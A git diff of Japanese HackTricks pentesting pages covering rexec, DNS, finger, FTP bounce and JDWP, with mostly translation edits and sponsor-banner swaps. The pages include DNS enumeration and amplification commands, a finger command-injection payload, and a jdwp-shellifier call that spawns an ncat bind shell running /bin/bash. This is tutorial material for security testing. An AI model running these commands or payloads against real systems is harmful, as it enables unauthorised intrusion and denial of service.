<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 429.597656 101.195312 C 426.597656 102.1875 423.371094 102.679688 419.933594 102.679688 C 415.503906 102.679688 412.292969 101.75 410.292969 99.886719 C 408.292969 98.03125 407.296875 95 407.296875 90.808594 L 407.296875 79.476562 L 401.363281 79.476562 L 401.363281 70.929688 L 407.296875 70.929688 L 407.296875 62.738281 L 419.039062 62.738281 L 419.039062 70.929688 L 428.292969 70.929688 L 428.292969 79.476562 L 419.039062 79.476562 L 419.039062 89.980469 C 419.039062 91.363281 419.386719 92.382812 420.078125 93.03125 C 420.769531 93.683594 421.890625 94.007812 423.425781 94.007812 C 424.734375 94.007812 426.3125 93.730469 428.171875 93.175781 L 429.597656 101.1875 Z M 429.597656 101.195312 "/>
<g clip-path="url(#clip2)" clip-rule="nonzero">
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(98.039216%,50.196078%,44.705882%);fill-opacity:1;" d="M 94.671875 53.417969 L 144.664062 66.070312 C 145.042969 65.535156 145.425781 65.007812 145.804688 64.476562 L 145.804688 64.460938 C 147.347656 62.273438 148.871094 60.058594 150.371094 57.835938 C 150.601562 57.496094 150.820312 57.15625 151.050781 56.816406 C 152.269531 55.003906 153.464844 53.175781 154.65625 51.339844 C 155.027344 50.765625 155.402344 50.183594 155.769531 49.601562 C 156.835938 47.933594 157.886719 46.25 158.933594 44.5625 C 159.300781 43.964844 159.671875 43.371094 160.039062 42.777344 C 161.394531 40.554688 162.738281 38.308594 164.0625 36.058594 L 164.332031 35.546875 L 162.542969 35.546875 C 156.15625 42.019531 148.746094 49.203125 141.851562 55.148438 L 94.671875 43.210938 L 42.761719 56.332031 L 43.703125 66.3125 Z M 94.671875 53.417969 "/>
</g>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(16.470588%,46.27451%,81.960784%);fill-opacity:1;" d="M 64.011719 149.238281 C 92.40625 127.675781 117.625 102.296875 139.085938 73.6875 L 94.671875 62.453125 L 44.652344 75.105469 L 47.867188 109.082031 C 49.273438 123.929688 54.976562 137.832031 64.019531 149.238281 Z M 64.011719 149.238281 "/>
<g clip-path="url(#clip3)" clip-rule="nonzero">
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 53.257812 170.839844 C 53.058594 170.992188 52.851562 171.152344 52.652344 171.304688 C 50.726562 172.78125 48.78125 174.234375 46.832031 175.671875 L 46.832031 176.871094 C 49.03125 176.007812 51.226562 175.128906 53.40625 174.21875 L 62.710938 170.175781 C 67.859375 167.84375 72.949219 165.390625 77.957031 162.816406 C 79.507812 163.976562 81.097656 165.09375 82.746094 166.140625 L 94.675781 173.742188 L 106.609375 166.140625 C 126.398438 153.515625 139.273438 132.464844 141.484375 109.089844 L 144.703125 75.113281 L 142.191406 74.476562 C 118.207031 111.519531 88.222656 144.023438 53.257812 170.839844 Z M 53.257812 170.839844 "/>
</g>
</g>
</svg>

Before

Width:  |  Height:  |  Size: 12 KiB

After

Width:  |  Height:  |  Size: 19 KiB

View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまでの機能を提供します。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
@ -23,7 +23,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
## 基本情報
**有効な** **資格情報**(ユーザー名とパスワード)を知っている場合、**ホスト内でコマンドを実行することを許可するサービス**です。
**有効な認証情報**(ユーザー名とパスワード)を知っている場合、**ホスト内でコマンドを実行することを許可するサービス**です。
**デフォルトポート:** 512
```
@ -32,9 +32,9 @@ PORT STATE SERVICE
```
### [**ブルートフォース**](../generic-methodologies-and-resources/brute-force.md#rexec)
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまで対応しています。私たちはペンテスターを置き換えるのではなく、彼ら深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すために、カスタムツール、検出およびエクスプロイトモジュールを開発しています。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまで対応しています。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すために、カスタムツール、検出およびエクスプロイトモジュールを開発しています。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -48,7 +48,7 @@ GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **ハッキングトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
* **ハッキングトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>
{% endhint %}

View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまでの機能を提供します。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
@ -23,7 +23,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
## **基本情報**
**ドメインネームシステム (DNS)** はインターネットのディレクトリとして機能し、ユーザーがgoogle.comやfacebook.comのような**覚えやすいドメイン名**を通じてウェブサイトにアクセスできるようにします。数値のインターネットプロトコル (IP) アドレスの代わりに。DNSはドメイン名をIPアドレスに変換することで、ウェブブラウザがインターネットリソースを迅速に読み込むことを保証し、オンライン世界のナビゲートを簡素化します。
**ドメインネームシステム (DNS)** はインターネットのディレクトリとして機能し、ユーザーがgoogle.comやfacebook.comのような**覚えやすいドメイン名**を通じてウェブサイトにアクセスできるようにします。これにより、数値のインターネットプロトコル (IP) アドレスの代わりにドメイン名をIPアドレスに変換することで、DNSはウェブブラウザがインターネットリソースを迅速に読み込むことを保証し、オンライン世界のナビゲートを簡素化します。
**デフォルトポート:** 53
```
@ -34,12 +34,12 @@ PORT STATE SERVICE REASON
```
### Different DNS Servers
* **DNS Root Servers**: これらはDNS階層の最上部にあり、トップレベルドメインを管理し、下位サーバーが応答しない場合にのみ介入します。インターネット名称と番号割り当て機関**ICANN**がその運営を監督しており、世界で13のサーバーがあります。
* **Authoritative Nameservers**: これらのサーバーは、指定されたゾーン内のクエリに対して最終的な回答を持ち、明確な答を提供します。応答できない場合、クエリはルートサーバーにエスカレーションされます。
* **DNS Root Servers**: これらはDNS階層の最上部にあり、トップレベルドメインを管理し、下位サーバーが応答しない場合にのみ介入します。インターネット名称と番号割り当て機関**ICANN**)がその運営を監督しており、世界で13のサーバーがあります。
* **Authoritative Nameservers**: これらのサーバーは、指定されたゾーン内のクエリに対して最終的な回答を持ち、明確な答を提供します。応答できない場合、クエリはルートサーバーにエスカレーションされます。
* **Non-authoritative Nameservers**: DNSゾーンに対する所有権がないこれらのサーバーは、他のサーバーへのクエリを通じてドメイン情報を収集します。
* **Caching DNS Server**: このタイプのサーバーは、将来のリクエストの応答時間を短縮するために、以前のクエリの回答を一定の時間記憶します。キャッシュの期間は権威サーバーによって決定されます。
* **Forwarding Server**: 単純な役割を果たすフォワーディングサーバーは、クエリを別のサーバーに中継するだけです。
* **Resolver**: コンピュータやルーターに統合されているリゾルバーは、ローカルで名前解決を実行し、権威とは見なされません。
* **Resolver**: コンピュータやルーターに統合されているリゾルバーは、ローカルで名前解決を実行し、権威あるものとは見なされません。
## Enumeration
@ -58,7 +58,7 @@ dig version.bind CHAOS TXT @DNS
```
### **Any record**
レコード **ANY** は、DNSサーバーに **返す** ように要求し、**開示する意志のある** すべての利用可能な **エントリ** を取得します。
レコード **ANY** は、DNSサーバーに **返す** ように要求します。すべての利用可能な **エントリ****開示する意志がある** ものです。
```bash
dig any victim.com @<DNS_IP>
```
@ -116,9 +116,9 @@ dnsrecon -d active.htb -a -n <IP_DNS> #Zone transfer
内部IPアドレスに解決するサブドメインを見つけることができた場合、そのIP範囲を要求するドメインのNSに対してリバースDNSブルートフォースを実行してみてください。
{% endhint %}
別のツール: [https://github.com/amine7536/reverse-scan](https://github.com/amine7536/reverse-scan)
別のツールはこちら: [https://github.com/amine7536/reverse-scan](https://github.com/amine7536/reverse-scan)
リバースIP範囲をクエリできます: [https://bgp.he.net/net/205.166.76.0/24#\_dns](https://bgp.he.net/net/205.166.76.0/24#\_dns)このツールはBGPにも役立ちます
リバースIP範囲をクエリできます: [https://bgp.he.net/net/205.166.76.0/24#\_dns](https://bgp.he.net/net/205.166.76.0/24#\_dns) (このツールはBGPにも役立ちます)
### DNS - サブドメインブルートフォース
```bash
@ -145,7 +145,7 @@ nmap -sSU -p53 --script dns-nsec-enum --script-args dns-nsec-enum.domains=paypal
```
### IPv6
サブドメインのIPv6を収集するために「AAAA」リクエストを使用したブルートフォース。
"AAAA" リクエストを使用してサブドメインのIPv6を収集するためのブルートフォース。
```bash
dnsdict6 -s -t <domain>
```
@ -155,7 +155,7 @@ dnsrevenum6 pri.authdns.ripe.net 2001:67c:2e8::/48 #Will use the dns pri.authdns
```
### DNS再帰DDoS
もし**DNS再帰が有効**であれば、攻撃者はUDPパケットの**起源**を**偽装**して**DNSが被害者サーバーに応答を送信する**ようにすることができます。攻撃者は**ANY**または**DNSSEC**レコードタイプを悪用することができ、これらはより大きな応答を持つためです。\
もし**DNS再帰が有効**になっている場合、攻撃者はUDPパケットの**起源**を**偽装**して**DNSが被害者サーバーに応答を送信する**ようにすることができます。攻撃者は**ANY**または**DNSSEC**レコードタイプを悪用することができ、これらはより大きな応答を持つためです。\
DNSが**再帰**をサポートしているかどうかを**確認**する方法は、ドメイン名をクエリし、**フラグ "ra"**_再帰利用可能_が応答に含まれているかを**確認**することです:
```bash
dig google.com A @<IP>
@ -168,9 +168,9 @@ dig google.com A @<IP>
![](<../.gitbook/assets/image (146).png>)
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンからレポーティングまで。私たちはペンテスターを置き換えるのではなく、彼ら深く掘り下げ、シェルをポップし、楽しむための時間を戻すためにカスタムツール、検出および悪用モジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -182,7 +182,7 @@ dig google.com A @<IP>
* 生成サーバーは `server.example.com` として特定されました。
* `user@example.com` に対する失敗通知が、エラーコード `#550 5.1.1 RESOLVER.ADR.RecipNotFound; not found` と共に返されました。
* 元のメッセージヘッダーに内部IPアドレスとホスト名が開示されました。
* 内部IPアドレスとホスト名が元のメッセージヘッダーに開示されました。
```markdown
The original message headers were modified for anonymity and now present randomized data:
@ -283,9 +283,9 @@ Description: DNS enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit'
```
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼ら深く掘り下げ、シェルをポップし、楽しむための時間を戻すためにカスタムツール、検出および悪用モジュールを開発します。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -299,7 +299,7 @@ GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>
{% endhint %}

View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。リコンから報告までの機能を提供します。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
@ -23,7 +23,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
## **基本情報**
**Finger** プログラム/サービスは、コンピュータユーザーに関する詳細を取得するために利用されます。通常、提供される情報には **ユーザーのログイン名、フルネーム**、および場合によっては追加の詳細が含まれます。これらの追加の詳細には、オフィスの場所や電話番号(利用可能な場合)、ユーザーがログインした時間、非アクティブ期間(アイドル時間)、ユーザーが最後にメールを読んだ時刻、ユーザーの計画およびプロジェクトファイルの内容が含まれることがあります。
**Finger**プログラム/サービスは、コンピュータユーザーに関する詳細を取得するために利用されます。通常、提供される情報には**ユーザーのログイン名、フルネーム**、および場合によっては追加の詳細が含まれます。これらの追加の詳細には、オフィスの場所や電話番号(利用可能な場合)、ユーザーがログインした時間、非アクティブ期間(アイドル時間)、ユーザーが最後にメールを読んだ時刻、ユーザーのプランおよびプロジェクトファイルの内容が含まれることがあります。
**デフォルトポート:** 79
```
@ -71,7 +71,7 @@ finger "|/bin/ls -a /@example.com"
finger user@host@victim
finger @internal@external
```
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すために、カスタムツール、検出および悪用モジュールを開発します。

View file

@ -1,21 +1,21 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
AWSハッキングを学び、実践する<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
<summary>HackTricksをサポートする</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発しています。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -26,41 +26,41 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
## 要件
- FTP中間サーバーの有効な認証情報
- FTPミドルサーバーの有効な認証情報
- 被害者FTPサーバーの有効な認証情報
- 両方のサーバーがPORTコマンドを受け入れるバウンスFTP攻撃
- FRP中間サーバーのいくつかのディレクトリに書き込むことができる
- 中間サーバーは、何らかの理由で被害者FTPサーバー内であなたよりも多くのアクセス権を持つこれがあなたが悪用する点です
- FRPミドルサーバーのいくつかのディレクトリに書き込むことができる
- ミドルサーバーは、何らかの理由で被害者FTPサーバー内であなたよりも多くのアクセス権を持つこれがあなたが悪用する点です
## 手順
1. 自分のFTPサーバーに接続し、接続をパッシブにしてpasvコマンド、被害者サービスがファイルを送信するディレクトリでリッスンさせる
2. FTP中間サーバーが被害者サーバーに送信するファイルを作成する(悪用)。このファイルは、被害者サーバーに対して認証するために必要なコマンドのプレーンテキストであり、ディレクトリを変更し、自分のサーバーにファイルをダウンロードします。
3. FTP中間サーバーに接続し、前のファイルをアップロードする
4. FTP中間サーバーが被害者サーバーと接続を確立し、悪用ファイルを送信させる
2. FTPミドルサーバーが被害者サーバーに送信するファイルを作成する(悪用)。このファイルは、被害者サーバーに対して認証するために必要なコマンドのプレーンテキストであり、ディレクトリを変更し、自分のサーバーにファイルをダウンロードします。
3. FTPミドルサーバーに接続し、前のファイルをアップロードする
4. FTPミドルサーバーが被害者サーバーと接続を確立し、悪用ファイルを送信させる
5. 自分のFTPサーバーでファイルをキャプチャする
6. FTP中間サーバーから悪用ファイルを削除する
6. FTPミドルサーバーから悪用ファイルを削除する
詳細な情報については、次の投稿を確認してください: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html)
詳細な情報については、投稿を確認してください:[http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html)
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出および悪用モジュールを開発しています。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
AWSハッキングを学び、実践する<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
<summary>HackTricksをサポートする</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
</details>
{% endhint %}

View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すために、カスタムツール、検出および悪用モジュールを開発しています。
@ -33,29 +33,29 @@ JDWPの悪用は、**プロトコルの認証と暗号化の欠如**に依存し
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept
```
`--break-on 'java.lang.String.indexOf'` を使用すると、エクスプロイトがより**安定**します。また、ホストにバックドアをアップロードしてコマンドを実行する代わりにそれを実行する機会があれば、エクスプロイトはさらに安定します。
`--break-on 'java.lang.String.indexOf'`を使用すると、エクスプロイトがより**安定**します。また、ホストにバックドアをアップロードしてコマンドを実行する代わりにそれを実行する機会があれば、エクスプロイトはさらに安定します。
## 詳細
**これは [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/) の要約です**。詳細については、こちらを確認してください。
**これは[https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)の要約です**。詳細については、こちらを確認してください。
1. **JDWP 概要**:
1. **JDWP概要**:
- パケットベースのネットワークバイナリプロトコルで、主に同期的です。
- 認証と暗号化が欠如しており、敵対的なネットワークにさらされると脆弱です。
2. **JDWP ハンドシェイク**:
2. **JDWPハンドシェイク**:
- 通信を開始するためにシンプルなハンドシェイクプロセスが使用されます。デバッガクライアントとデバッグ対象サーバー間で14文字のASCII文字列「JDWP-Handshake」が交換されます。
3. **JDWP 通信**:
- メッセージは、Length、Id、Flag、CommandSetなどのフィールドを持つシンプルな構造です。
- CommandSetの値は0x40から0x80までで、異なるアクションやイベントを表します。
3. **JDWP通信**:
- メッセージは長さ、ID、フラグ、コマンドセットなどのフィールドを持つシンプルな構造です。
- コマンドセットの値は0x40から0x80までで、異なるアクションやイベントを表します。
4. **エクスプロイト**:
- JDWPは任意のクラスバイトコードをロードして呼び出すことを許可し、セキュリティリスクを引き起こします。
- 記事では、Java Runtimeの参照を取得し、ブレークポイントを設定し、メソッドを呼び出すという5つのステップからなるエクスプロイトプロセスが詳述されています。
- JDWPは任意のクラスバイトコードをロードして呼び出すことを許可し、セキュリティリスクを引き起こします。
- 記事では、Javaランタイムの参照を取得し、ブレークポイントを設定し、メソッドを呼び出すという5つのステップからなるエクスプロイトプロセスが詳述されています。
5. **実際のエクスプロイト**:
- ファイアウォール保護の可能性にもかかわらず、JDWPサービスは発見可能で、実際のシナリオでエクスプロイト可能です。これはShodanHQやGitHubなどのプラットフォームでの検索によって示されています。
- ファイアウォール保護の可能性にもかかわらず、JDWPサービスは発見可能で、ShodanHQやGitHubなどのプラットフォームでの検索によって実際のシナリオでエクスプロイト可能です。
- エクスプロイトスクリプトはさまざまなJDKバージョンに対してテストされており、プラットフォームに依存せず、信頼性のあるリモートコード実行RCEを提供します。
6. **セキュリティの影響**:
@ -76,9 +76,9 @@ JDWPの悪用は、**プロトコルの認証と暗号化の欠如**に依存し
* [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html)
* [http://nmap.org/nsedoc/scripts/jdwp-exec.html](http://nmap.org/nsedoc/scripts/jdwp-exec.html)
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼ら深く掘り下げ、シェルをポップし、楽しむための時間を戻すためにカスタムツール、検出およびエクスプロイトモジュールを開発します。
**脆弱性評価とペネトレーションテストのための即時利用可能なセットアップ**。20以上のツールと機能を使用して、どこからでも完全なペンテストを実行できます。私たちはペンテスターを置き換えるのではなく、彼らがより深く掘り下げ、シェルをポップし、楽しむための時間を取り戻すためにカスタムツール、検出およびエクスプロイトモジュールを開発します。
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -92,7 +92,7 @@ GCPハッキングを学び、実践する<img src="/.gitbook/assets/grte.png
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
